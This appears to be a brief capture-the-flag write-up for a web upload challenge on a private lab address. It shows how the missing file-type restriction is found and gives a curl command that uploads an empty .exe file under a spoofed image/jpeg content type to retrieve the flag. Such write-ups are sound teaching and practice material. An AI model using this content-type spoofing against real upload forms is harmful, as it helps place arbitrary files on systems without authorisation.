1. Navigate to /index.php?page=upload
   open dev tools and discover that there is no "accept" attribute on file input,
   meaning we can upload any file type
2. create file with harmful content!:
   touch kill_em_all.exe
3. discover form input names
   the input name for file is: "uploaded"
   name and value for upload button is: "Upload"
4. Perform post request to upload your extremely harmful file:

   curl -s -F "uploaded=@kill_em_all.exe;type=image/jpeg" -F "Upload=Upload" -X POST "http://10.111.1.22/index.php?page=upload" | grep flag

   and we have the flag!
